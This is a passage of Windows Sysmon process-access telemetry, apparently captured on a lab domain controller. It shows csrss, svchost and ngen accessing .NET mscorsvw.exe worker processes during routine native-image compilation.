C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.496","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001033530E00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6995,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001033530E00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001033530E00}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6996,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.527\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010B7560E00}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.527","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010B7560E00}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6997,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.527\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010B7560E00}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.527","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010B7560E00}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6998,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.543\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010B7560E00}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.543","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010B7560E00}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6999,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.574\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00103F5A0E00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.574","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00103F5A0E00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7000,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.574\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00103F5A0E00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.574","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00103F5A0E00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7001,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00103F5A0E00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00103F5A0E00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7002,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.621\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010C35D0E00}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 